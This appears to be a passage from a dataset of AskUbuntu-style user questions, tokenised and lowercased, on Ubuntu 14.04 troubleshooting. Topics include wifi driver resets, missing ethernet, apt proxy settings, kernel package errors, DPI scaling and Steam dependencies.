( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : sony corporation device 90ab flags : bus master , medium devsel , latency 0 , irq 23 memory at c1318000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) subsystem : sony corporation device 90ab flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : sony corporation device 90ab flags : bus master , 66mhz , medium devsel , latency 0 , irq 44 i/o ports at 4048 [ size=8 ] i/o ports at 4054 [ size=4 ] i/o ports at 4040 [ size=8 ] i/o ports at 4050 [ size=4 ] i/o ports at 4020 [ size=32 ] memory at c1317000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) subsystem : sony corporation device 90ab flags : medium devsel , irq 10 memory at c1315000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at 4000 [ size=32 ] 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7550m/7570m/7650m ] ( prog-if 00 [ vga controller ] ) subsystem : sony corporation device 90ab flags : bus master , fast devsel , latency 0 , irq 47 memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at c0000000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at 3000 [ size=256 ] expansion rom at c0040000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : radeon 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] turks/whistler hdmi audio [ radeon hd 6000 series ] subsystem : sony corporation device 90ab flags : bus master , fast devsel , latency 0 , irq 48 memory at c0020000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 07:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) subsystem : foxconn international , inc. device e044 flags : bus master , fast devsel , latency 0 , irq 16 memory at c1200000 ( 64-bit , non-prefetchable ) [ size=512k ] expansion rom at c1500000 [ disabled ] [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k 08:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) subsystem : sony corporation device 90ab flags : bus master , fast devsel , latency 0 , irq 42 memory at c1100000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : rtsx_pci 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) subsystem : sony corporation device 90ab flags : bus master , fast devsel , latency 0 , irq 43 i/o ports at 2000 [ size=256 ] memory at c1004000 ( 64-bit , prefetchable ) [ size=4k ] memory at c1000000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 lshw -c network ashton @ laptop : ~ $ sudo lshw -c network *-network description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:07:00.0 logical name : wlan0 version : 01 serial : 08:3e:8e : d2:5d:81 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-29-generic firmware=n/a ip=192.168.0.6 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : c1200000-c127ffff memory : c1500000-c150ffff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 07 serial : 30 : f9 : ed : c3 : f2 : e3 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : c1004000-c1004fff memory : c1000000-c1003fff i 've noticed in the `` connection information '' window accessible through networkmanager the speed generally shows as 16mb/s upwards whether or not i can currently access the internet . edit : when trying this : sudo ifconfig wlan0 down & & sudo modprobe -rv ath9k & & sudo modprobe -v ath9k nohwcrypt=1 & & sudo ifconfig wlan0 up this happens ( regardless of whether the internet was working at the time ) the internet disconnects . something [ 1 ] is logged in the console . the networks disappear from the networkmanager drop-down . two different scenarios encountered , unable to isolate branching behaviour . scenario a nothing happens scenario b the drop-down options reappear and networkmanager attempts to reconnect but always fails . the only way i know how to regain a connection from here is to restart the computer . [ 1 ] ( from console ) : ashton @ laptop : ~ $ sudo ifconfig wlan0 down & & sudo modprobe -rv ath9k & & sudo modprobe -v ath9k nohwcrypt=1 & & sudo ifconfig wlan0 up [ sudo ] password for ashton : rmmod ath9k rmmod mac80211 rmmod ath9k_common rmmod ath9k_hw rmmod ath rmmod cfg80211 insmod /lib/modules/3.13.0-29-generic/kernel/net/wireless/cfg80211.ko insmod /lib/modules/3.13.0-29-generic/kernel/net/mac80211/mac80211.ko insmod /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/ath/ath.ko insmod /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko insmod /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko insmod /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko nohwcrypt=1
513540	help installing ?	i 'm having a really big problem with installing ubuntu on my computer . it seems that when i try to install from bios from the cd , nothing happens , and when i say nothing happens it boots up my computer like usual . when i try to install from the cd from my computer directly from the wubi.exe file , nothing happens . then when i try to install from the boot helper , it gives me this error : an error occurred : could not retrieve the required installation files for more information please see the log file : c : \users\meghan\appdata\local\temp\wubi-14.04-rev286.log will it help if i say i have a pirated version of windows ? maybe that 's why ? i 'm frustrated , and i 'm not sure what to do . please help me
513541	wired connection can not be established - no eth0	i am on ubuntu trusty 14.04 , and i recently lost my wired ethernet connection for uknown reason . i get eth0 no such device and other related errors . i tried many solutions from other posts , and i probably messed up things more . i also removed /etc/udev/rules.d/70-persistent-net.rules and i tried to regenerate with no luck right now , my networking is always disabled and i am not able to enable . notice that is a dual boot , and i do connect perfectly fine in my old windows installation . below i attach some outputs i guess will be useful . any help will be highly appreciated . tania @ tania : ~ $ ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 up loopback running mtu:65536 metric:1 rx packets:202 errors:0 dropped:0 overruns:0 frame:0 tx packets:202 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:15228 ( 15.2 kb ) tx bytes:15228 ( 15.2 kb ) tania @ tania : ~ $ cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp tania @ tania : ~ $ sudo lshw -c network [ sudo ] password for tania : *-network unclaimed description : ethernet controller product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list configuration : latency=0 resources : ioport : de00 ( size=256 ) memory : fbcff000-fbcfffff memory : fbcf8000-fbcfbfff
513549	how to turn off/lock screen when using vino vnc ?	i have a laptop ( acer aspire v3-472g ) with a working vino vnc server on ubuntu 14.04 lts 64 bit . my problem is that when i connect with a vnc client , people near my laptop can see what i am doing . i want to connect to display 0 with vnc , because i want to use the programs which i launched locally . i do n't mind having to open an ssh connection and executing some commands . there is a `` disable screen '' fn key , but when pressed , the screen blinks and will not turn off .
513554	must execute `` sudo su '' and then do apt-get update/upgrade/install , prefacing with sudo does n't work	in order to get the apt-get update/upgrade/install commands to work , i have added proxy information to my /etc/environment file . for example : http_proxy= '' http : //proxy-chain.acmewidgets.com:8080/ '' https_proxy= '' https : //proxy-chain.acmewidgets.com:8080/ '' ftp_proxy= '' ftp : //proxy-chain.acmewidgets.com:8080/ '' socks_proxy= '' socks : //proxy-chain.acmewidgets.com:8080/ '' then , and this is important for my setup ( not sure why - that is my question ) , i have to enter super user mode in order to get apt-get to work . like i said , i 'm not sure why , but simply prefacing the aforementioned apt-get commands with sudo does not work for me . for example , when i do sudo apt-get update , the terminal window hangs like so : somedude @ acme-widgets-03 : ~ $ sudo apt-get update 0 % [ connecting to us.archive.ubuntu.com ( 91.189.91.13 ) ] [ connecting to security what works is entering sudo su at the command line and then running the apt-get commands without prefacing with sudo . i have to do this even if i am working in a super user terminal ( opened by executing sudo gnome-terminal ) . until i issue that sudo su command at the prompt , the proxy settings in /etc/environment are not seen . i checked this by doing echo $ http_proxy before and after the su ; before : nothing came back , after : what was set in /etc/environment came back . not a big deal , because i am able to get my updates and do my installations ; but the idea with ubuntu is to use sudo so that you do n't do damage accidentally while in super user mode . so what is going on do you think ? thanks .
513555	eclipse luna displaying regular scrollbars instead of overlay scrollbars - how to change ?	i 've recently switched to using the new eclipse luna , but for some reason it stopped displaying the overlay scrollbars , and now shows the regular ones that are in e.g . firefox . kepler had them . since eclipse ui is cluttered already , i would like to turn them back on , how can that be done ?
513559	pixelated launcher icons in the launcher	after upgrading from 12.04 to 14.04.1 , the launcher icons are pixelated as shown in the image . an extra reboot did not resolve the issue . the only relevant customization i can think of is that i adjusted dpi settings in 12.04 , although i do n't remember exactly what settings .
513561	how can a regular user be notified of a required reboot ?	i am administrating multiple machines on which i am admin and the users have not admin-rights . the machines are configured to pull and install updates automatically . a new kernel will require a reboot . on ubuntu precise this was made visible to the user through the color change of the shutdown-menu in the upper right corner ( it turned red ) . now , on ubuntu trusty , there is not color change anymore . also , the update manager will not pop up for regular users reminding them of an outstanding reboot . how can a regular user know that a reboot is required ?
513563	file manager 's column `` date modified '' does n't show time ?	i am using xubuntu 14.04 . in the file manager , the date modified column does n't show the modification time . how can i make it display the time , along with the date ?
513564	virtual box windows 7 screen size problems	i have windows 7 installed in virtual box with ubuntu 14.04 . i can not get it into full screen ... there is at least 3 inches of black on both side and an inch at the top and bottom . i already installed guest additions and that had no effect . does anyone know a fix ?
513565	macbook air ( 3,2 ) odd behavior when starting	so i partitioned my drive and installed ubuntu 14.04 on my mac . i went in ubuntu to install some proprietary drivers . restarted my computer and this is what happened : started normally login prompt , though missing background and toolbar . once i log on , this weird light blue screen apperes with 2 error screens indicating a problem .
513567	nautilus ( file ) 3.10.1 how to lock drag and drop bookmarks	from the new nautilus releases exist the ability to create shortcut/bookmarks simply by drag & drop folder onto the nautilus left panel ; however , this behavior can unintentionally create additional bookmarks if you are not very accurate when dragging files to bookmarks , especially by people with little experience in the use of computer . how is possible to disable the drag & drop bookmarks creation ? or ideally should be planning to implement the drag & drop mode only if you are running in conjunction with the press of a key on the keyboard ..
513568	low graphic mode after switching to fglrx drivers	i have another problem on my laptop after trying to fix another issue . so , because of this issue , i wanted to switch to fglrx to fix it and after restart , i got this screen : i went back to terminal and i got rid of this problem by `` purge '' -ing the fglrx driver and removing it , going back to problem number one . i tried lot of methods to fix this such as this ones but they ether switched back to open-source drivers or did n't helped at all . so would anyone like to help ? maybe give some commends to try ? my laptop has 2 gpu , amd radeon hd 7650m and intel ( r ) hd graphics 4000 . amd is running always making my laptop too hot . here 's one of the xorg.5.log file paste , i am sure it will be useful finding my problem . thanks ! please make answer easy to understand as i am not an expert , this problem is keeping me from being one . also the amd driver which can be downloaded from their site does n't install , it says non compatible graphics card but ubuntu software updater sure installs it . edit : actually after installing intel drivers , it installs too but it gives low graphics mode after install . sometimes it does n't but in that cases it just freezes after i log into my account after login screen , desktop does n't load .
513572	skype 4.3 will not install , continues to install 4.2	i can not seem to get skype 4.3 to install on my laptop ( 14.04 ) i have followed many a instillation guide , but every time it seems to install 4.2 again . i am completely stumped .
513573	`` errors while handling '' kernel packages after dist-upgrade	i did an apt-get dist-upgrade , now everytime i do something using apt-get , e.g . installing something , it gives me that there are errors while handling the following packages : linux-image-extra-3.13.0-35-generic linux-image-generic linux-generic my system still works correctly , but is this normal ? and what should i do ? should i do anything ? have i done the wrong thing by doing a dist-upgrade ? ( beginner-like instructions please , i 'm not an expert . using xubuntu 14.04 . ) here is the full output of dist-upgrade , as someone asked for it : pakketlijsten worden ingelezen ... klaar boom van vereisten wordt opgebouwd de status informatie wordt gelezen ... klaar opwaardering wordt doorgerekend ... klaar de volgende pakketten zullen opgewaardeerd worden : google-chrome-beta openjdk-7-jre openjdk-7-jre-headless 3 pakketten opgewaardeerd , 0 pakketten nieuw ge誰nstalleerd , 0 te verwijderen en 0 niet opgewaardeerd . 3 pakketten niet volledig ge誰nstalleerd of verwijderd . er moeten 88,8 mb aan archieven opgehaald worden . door deze operatie zal er 480 kb extra schijfruimte gebruikt worden . wilt u doorgaan ? [ j/n ] j ophalen:1 http : //be.archive.ubuntu.com/ubuntu/ trusty-updates/main openjdk-7-jre amd64 7u65-2.5.1-4ubuntu1~0.14.04.1 [ 183 kb ] ophalen:2 http : //dl.google.com/linux/chrome/deb/ stable/main google-chrome-beta amd64 37.0.2062.94-1 [ 49,2 mb ] ophalen:3 http : //be.archive.ubuntu.com/ubuntu/ trusty-updates/main openjdk-7-jre-headless amd64 7u65-2.5.1-4ubuntu1~0.14.04.1 [ 39,5 mb ] 88,8 mb opgehaald in 15s ( 5.793 kb/s ) ( database inlezen ... 386009 files and directories currently installed . ) preparing to unpack ... /google-chrome-beta_37.0.2062.94-1_amd64.deb ... unpacking google-chrome-beta ( 37.0.2062.94-1 ) over ( 37.0.2062.76-1 ) ... preparing to unpack ... /openjdk-7-jre_7u65-2.5.1-4ubuntu1~0.14.04.1_amd64.deb ... unpacking openjdk-7-jre : amd64 ( 7u65-2.5.1-4ubuntu1~0.14.04.1 ) over ( 7u55-2.4.7-1ubuntu1 ) ... preparing to unpack ... /openjdk-7-jre-headless_7u65-2.5.1-4ubuntu1~0.14.04.1_amd64.deb ... unpacking openjdk-7-jre-headless : amd64 ( 7u65-2.5.1-4ubuntu1~0.14.04.1 ) over ( 7u55-2.4.7-1ubuntu1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ( 3.54ubuntu1 ) ... processing triggers for hicolor-icon-theme ( 0.13-1 ) ... instellen van linux-image-extra-3.13.0-35-generic ( 3.13.0-35.62 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) initrd.img ( /boot/initrd.img-3.13.0-35-generic ) points to /boot/initrd.img-3.13.0-35-generic ( /boot/initrd.img-3.13.0-35-generic ) -- doing nothing at /var/lib/dpkg/info/linux-image-extra-3.13.0-35-generic.postinst line 491. vmlinuz ( /boot/vmlinuz-3.13.0-35-generic ) points to /boot/vmlinuz-3.13.0-35-generic ( /boot/vmlinuz-3.13.0-35-generic ) -- doing nothing at /var/lib/dpkg/info/linux-image-extra-3.13.0-35-generic.postinst line 491 . examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.0-35-generic /boot/vmlinuz-3.13.0-35-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.0-35-generic /boot/vmlinuz-3.13.0-35-generic update-initramfs : generating /boot/initrd.img-3.13.0-35-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.13.0-35-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-extra-3.13.0-35-generic.postinst line 1025. dpkg : error processing package linux-image-extra-3.13.0-35-generic ( -- configure ) : subproces installed post-installation script gaf een foutwaarde 2 terug dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic is afhankelijk van linux-image-extra-3.13.0-35-generic ; maar : pakket linux-image-extra-3.13.0-35-generic is nog niet geconfigureerd . dpkg : error processing package linux-image-generic ( -- configure ) : vereistenproblemen - blijft ongeconfigureerd er is geen apport-verslag weggeschreven omdat de foutmelding volgt op een eerdere mislukking . dpkg : dependency problems prevent configuration of linux-generic : linux-generic is afhankelijk van linux-image-generic ( = 3.13.0.35.42 ) ; maar : pakket linux-image-generic is nog niet geconfigureerd . dpkg : error processing package linux-generic ( -- configure ) : vereistenproblemen - blijft ongeconfigureerd er is geen apport-verslag weggeschreven omdat de foutmelding volgt op een eerdere mislukking . instellen van google-chrome-beta ( 37.0.2062.94-1 ) ... instellen van openjdk-7-jre-headless : amd64 ( 7u65-2.5.1-4ubuntu1~0.14.04.1 ) ... installeren van nieuwe versie van configuratiebestand /etc/java-7-openjdk/sound.properties ... installeren van nieuwe versie van configuratiebestand /etc/java-7-openjdk/jvm-amd64.cfg ... instellen van openjdk-7-jre : amd64 ( 7u65-2.5.1-4ubuntu1~0.14.04.1 ) ... fouten gevonden tijdens behandelen van : linux-image-extra-3.13.0-35-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
513581	how to adjust dpi in 14.04	i asked about fixing dpi in 12.04 . the 14.04 release notes list `` support for high-dpi screens and desktop scaling . '' post upgrade , it seems that nothing has changed . similar symptoms from my previous post persist : the 1 '' square here is closer to 1/2 '' despite the line xserver-command=x -dpi 170 in /etc/lightdm/lightdm.conf , xdpyinfo reports 96x96 dpi i did find that i was able to use the `` scale for menu and title bars '' slider in system settings > displays to fix title bar text size instead of setting org.gnome.desktop.interface text-scaling-factor as described here . the last post also mentions that in gnome 3 , dpi is hard coded to 96 . is this a limitation in 14.04 ? ( i am somewhat ignorant to the distinction between gnome and unity ) can i do anything to properly set my dpi ?
513583	ubuntu 14.04 ( trusty ) dell latitude e4200 - battery drain	i have a question about battery draining in ubuntu 14.04 ( trusty ) , 64 % from 100 % in 30 minutes . also fan is working all the time .
513585	( syslinux question ) how to launch command prompt once syslinux boots up	i have created a bootable usb drive using syslinux i am booting my x86 system correctly . once system boots i want to stop at console ( command prompt ) where i can type linux commands ( cd etc ) and run my executable file manually . does that mean i have to have busy box installed ( for basic commands ) . what makes system stop at command prompt ? i do have /dev/console . my serial console is tty1 . any help is appreciated . # syslinux.cfg serial 0 9600 default myprogram prompt 1 label linux display message.msg timeout 100 kernel bzimage append console=tty1,9600 vga=773 initrd initrd.img
513586	ubuntu 14.04 compiz thumbnails preview flicker	ubuntu 14.04.1 x64 ( upgraded from 12.04 ) with unity desktop dell latitude with nvidia gf119m ( nvs 4200m ) - optimus is disabled using nvidia legacy binary driver 304.117 when i set the ccsm option to allow thumbnail previews , the thumbnail 'flickers ' for about 1 second before the actual thumbnail image is displayed . i do n't think i had this enabled under 12.04 so not sure if it 's version-specific . should i be using a different driver ( there are newer ones - ubu shows nvidia binary driver 331.38 and the non-proprietary nouveau , plus nvidia has newer ones at the site ) ? tia !
513589	password incorrect 3 times + suspected failed update	i have been lurking your site for the past few hours , and have found myself in a bit of a pickle . visiting my parents , i discover that neither computer , nor laptop work . long story short , i 've got the laptop working , but have completely fudged up the computer . i am a n00b , but i was at least willing to give it a go . the comp originally had ubuntu 11.10 installed , later updated to 12.04 . we have cds for both . i do not understand what the initial problem was for my parents , but somehow when i turned on the computer , it worked for me . soon after , i was nagged to install the latest updates . so , i spent the next half an hour wondering why the updates kept on asking for 11.04 cdroms , until i realised that you could turn off the cdrom necessity . after doing this via console , i installed some of the smaller updates , before being told to do a partial update . this failed a few times , and ended up freezing whilst reinstalling drivers . after a hard restart i continued to type whatever i could find on the forum into the console . at some point , the console started saying that i had 3 incorrect password inputs , and sudo commands stopped altogether . i found another thread discussing this ; but people kept on suggesting changing passwords ( which i did to no avail ) or other things that made use of sudo ( which i am locked out of , although i am technically the admin ) i found myself somehow on the ctrl+alt+f1 console , and after being utterly confused ( and ctrl+altf5 failing for me ) , another hard reset occurred . somewhere along the way i created a usb start up for 14.04 , ( but this does not seem to work ) now i am left with an admin ( and guest ) account that log in but have blank screens ( with only the desktop background showing ) and i ca n't do anything in the console because i 'm locked out . interestingly , the console now says that i am running 14.04 although all updates said they had failed . aside from the obvious lessons i have learnt ( do n't fiddle about in the console when you have no idea what you 're doing '' dog wearing safety glasses `` i have no idea what i am doing '' gif would be inserted here ) is there any way i can redeem this almighty muck up ? a million thanks for any help !
513590	14.04 bios , acpi errors in dmesg	i recently upgrade from 12.04 x64 to 14.04.1 x64 dell latitude laptop i am seeing messages in dmesg that are causing me concern . the 2 excerpts below are the ones i am most concerned with : [ 4.804950 ] i915 0000:00:02.0 : irq 46 for msi/msi-x [ 4.804961 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) . [ 4.804963 ] [ drm ] driver supports precise vblank timestamp query . [ 4.829044 ] [ drm ] wrong mch_sskpd value : 0x16040307 [ 4.829047 ] [ drm ] this can cause pipe underruns and display issues . [ 4.829048 ] [ drm ] please upgrade your bios to fix this . and this : [ 6.724294 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:01/input/input13 [ 6.724363 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 6.724426 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \pmio 1 ( 20131115/utaddress-251 ) [ 6.724432 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 6.724435 ] acpi warning : 0x0000000000000540-0x000000000000054f systemio conflicts with region \gpio 1 ( 20131115/utaddress-251 ) [ 6.724440 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 6.724441 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \gpio 1 ( 20131115/utaddress-251 ) [ 6.724446 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \_sb_.pci0.peg0.vid_.gpsp 2 ( 20131115/utaddress-251 ) [ 6.724449 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 6.724451 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \gpio 1 ( 20131115/utaddress-251 ) [ 6.724454 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \_sb_.pci0.peg0.vid_.gpsp 2 ( 20131115/utaddress-251 ) [ 6.724457 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 6.724459 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich update : regarding the bios message , i did in fact update my bios and that resolved the issue . still looking for help on the acpi warnings , if someone can point me in the right direction . ... .
513593	is it possible to make free space in extended partition ?	i have installed linux mint 17 and kubuntu 14.04 side by side . without making any partition . now i want to install elementary os luna by making some free space . tell me the procedures , please ! here are my details : ext4 471.61 gb extended 459.90 gb ext4 451.91 gb linux swap 7.99 gb
513594	how to make ipv6 duplicate address detection ( dad ) work on ubuntu ?	i have an ubuntu host running inet6 dhcp . this is what i configured on the /etc/network/interfaces file : auto eth1 iface eth1 inet6 dhcp up sysctl net.ipv6.conf.eth1.accept_ra=1 pre-down ip link set dev eth1 up the host gets the ipv6 address from the dhcpv6 server just fine ; however , i noticed that it seems to ignore icmpv6 neighbor advertisement from another host and the dad ( duplicate address detection ) mechanism does not seem to work on the ubuntu . is anyone seeing this same issue ? i wanted to test that the dhcpv6 server handles dhcpv6 decline message properly so i setup 2 ipv6 hosts on the same network . host a is configured with inet6 dhcp . after it gets the lease , i unplug its network cable . then i configure host b with a static address that was assigned to host a. i plug in host a 's network cable . host a and dhcpv6 server perform solicit , advertise , request , and reply . once host a gets the lease address , it sends out icmpv6 neighbor solicitation . host b then sends icmpv6 neighbor advertisement claiming that it has the address . at this point , i expect to see host a sends dhpcv6 decline so that the dhcpv6 server advertises a different address . however , host a seems to ignore host b 's na and uses the old address anyway ! i replaced host a with windows 7 laptop and i saw that win7 sent out dhcpv6 decline . it is hard to believe that ubuntu ( 12.04 ) does not get this right ! i am assuming that it must be the settings somewhere that need to be modified . these are what i have for the sysctl : net.ipv6.conf.eth1.dad_transmit=1 net.ipv6.conf.eth1.accept_dad=1 are these set with the correct value ? what other settings i should be looking ? thanks !
513595	where are kde themes located ?	i want to modify a few icons in the theme i am using for smooth tasks where i like two of the display states but one just does n't look right . how would i go about modifying them , and moreover where are they located ?
513597	can not connect to wifi using lubuntu gui on ubuntu server 14.04	as a first , i just want to say that this website is brilliant and has helped me no end whilst getting back into ubuntu . i have recently converted a vaio laptop to run ubuntu server 14.04 . the first snag which i have n't yet gotten over was getting a wireless internet connection for the server . during the install , it asked for details of my wireless router . on the first install i had the router setup to only accept known mac addresses , and also to not broadcast itself . after typing in the correct details for the network , it would n't add it . so i went back and connected to the router directly with an ethernet cable which did n't work at first , but after configuring the router to not filter mac addresses , it appeared to work fine . i tried to use the explanation found here to fix the wireless issue via the command line : how to connect and disconnect to a network manually in terminal ? unfortunately , none of the wpa_supplicant methods worked , and when i tried the network manager part , my computer said that it could n't find the create_connections folder . however this currently is n't the issue i am writing about now , ( i may have to start a new thread at some point ! ) i instead installed a lubuntu gui on the server to see if i could access a network manager from there , and access wireless via that . after downloading it and starting it , the internet still worked with an ethernet cable . however , there was no icon showing network manager , although there is a space so i did some more looking and found that you have to goto preferences > lx ... . and type nm-applet in the autostart tab . after doing this , and relogging in , no icon appeared , but the blank space increased . i double clicked on the blank space and network manager appeared , and two nm icons appeared . i used one of them to connect to my wireless router and thought all would be well ! ( both nm icons showed connection to my wireless network . ) after opening firefox , when trying to access the bbc website the circle kept on turning . at this point i turned off the eth0 port in case that was interfering , and it still did n't work . i went into the command line and typed `` ping -c 5 www.bbc.co.uk '' and after a while it said that it could n't connect to the server . i pinged the router address which was fine . i then turned on the eth0 port and i still did n't have access to the internet ! so i went back into preferences > lx ... and took of the nm-applet . after re-logging into the account i could then access the internet via ethernet cable . however the network manager icons had dissapeared , and when i clicked on the blank space , although options appeared , they were greyed out . i tried the nm-applet solution again and the icons appeared but when clicking on them the options are still greyed out . i have spent the majority of the last two days trying to solve this and getting nowhere . can anyone suggest anything to help ?
513598	how to uninstall haguichi/hamachi	i want to uninstall haguichi and hamachi from my computer , i try to find anything on google but i dont find nothig.i just want the codes to remove 100 % of haguichi and hamachi .
513600	can not get usb to boot in windows 8	i have created the usb stick with pen drive linux usb installer , and have disabled secure boot and selected the stick to be the bootable source , but it still goes to windows 8 instead of usb installed with ubuntu . i am having the hardest time with this , please help !
513607	custom bootable iso	okay , i 've been having a lot of issues breaking my os ( i 'm very new to ubuntu ) when it comes to installing drivers , updates , etc . i 'm running ubuntugnome 14.04.1 on an acer aspire 7750g with amd radeon 6850 video card . there 's a lot of tweaking i like to do before installing these updates right after installing the os ( installing chrome , some extensions , guake terminal , moka theme etc. ) . how can i create a custom bootable usb with of my os so i can fall back on that in case i mess something up ? it 's super annoying spending about half an hour tweaking my system only to have to do it over again . i know there 's info on the web for this , but a lot of it looks like foreign language to me as i do n't know much about command line . thanks in advance !
513611	upgrade from 12.04 lts to 14.04 lts fails	output of the bash terminal : http : //pastebin.com/wxktlzin i used apt-get upgrade -f as well , with the same result . i only want the 14.04 lts that works fine and i do n't lose my data . in the past the package management system meet my needs with approval . it 's sophisticated , but now i really do n't know it 's better . in 12.04 i used other package sources for bumblebee and gimp as far as i know . i deleted the sources before i used apt-get dist-upgrade . > lsb_release -r release : 14.04
513616	what is the best freeware app for windows to mount ext4 partitions ( from a gpt 4tb disk ) as rw , safely without corrupting the ext4 partition ?	my computer is set up as dualboot windows and ubuntu . i have 1 os drive , and 1 hard drive with a /backup partition ( which has all my family photos and data ) and it is ext4 . also note ... it is ext4 , and it is gpt , and it is 4tb size . anyway , windows can not mount the /backup ext4 partition . what software/freeware do you reccomend for windows ? preferrably looking for someone with experiance using it for a long time and not have problems with ext4 partition which is a 4tb , gpt disk .
513617	ubuntu 14.04 : using two montiors connected to two different cards	i have two monitors connected to my computer . one is hooked up to a discrete amd radeon 6670 and one is hooked to an integrated amd radeon 7560d . i want to use both at the same time but my ubuntu ( 14.04 ) is not recognizing the one hooked up to the radeon 6670 . is there a solution to this ? thanks .
513619	i fixed my ppa errors but when i try to install steam all additional packages say no installation candidate	while i was downloading steam i get this code : user @ computer : ~/downloads $ sudo dpkg -i steam_latest.debselecting previously unselected package steam-launcher . ( reading database ... 195561 files and directories currently installed . ) preparing to unpack steam_latest.deb ... unpacking steam-launcher ( 1.0.0.48 ) ... dpkg : dependency problems prevent configuration of steam-launcher : steam-launcher depends on curl ; however : package curl is not installed . dpkg : error processing package steam-launcher ( -- install ) : dependency problems - leaving unconfigured processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ( 3.54ubuntu1 ) ... processing triggers for hicolor-icon-theme ( 0.13-1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : steam-launcher however steam is still 'installed . ' when i click on it these are the results . steam needs to install these additional packages : ' curl , libgl1-mesa-dri : i386 , libgl1-mesa-glx : i386 , libc6 : i386 [ sudo ] password for tristan : ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. reading package lists ... done building dependency tree 